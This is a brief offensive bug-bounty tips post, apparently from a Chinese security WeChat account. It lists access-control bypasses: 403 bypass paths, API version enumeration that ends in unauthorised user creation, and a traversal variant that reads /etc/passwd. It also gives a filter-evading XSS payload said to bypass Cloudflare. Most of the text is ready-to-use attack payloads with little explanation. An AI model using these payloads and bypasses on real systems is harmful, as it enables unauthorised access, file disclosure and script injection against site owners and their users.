Bug type: 403 Bypass
site[.]com/env => 403 Forbidden
site[.]com/env/HTTPS2 => Bypassed
API hacking Status: [Dup] Internally known
Tip: Check endpoint's on different api versions
1. GET /v2/users or /v2/users.json -> 403
2. GET /v3/users -> 403
3. GET /v3/users.json -> 200
4. GET /v4/users -> 200
5. POST /v4/users -> 200 [Users created]
https://github.com/zeroc00I/AllVideoPocsFromHackerOne/tree/main/weakness
"><sVg/OnLuFy="X=y"oNloaD=;1^confirm(1)>/``^1//
来源:https://github.com/HernanRodriguez1
补充阅读:XSS 绕过 CLOUDFLARE + 过滤器
https://0xjin.medium.com/new-xss-bypass-cloudflare-filters-2a878c01d312
../../etc/passwd = 403 Forbidden
../../etc/random/../passwd = 200 OK
推荐阅读:
点赞,转发,在看
由HACK学习编辑整理,如需转载请注明来源HACK学习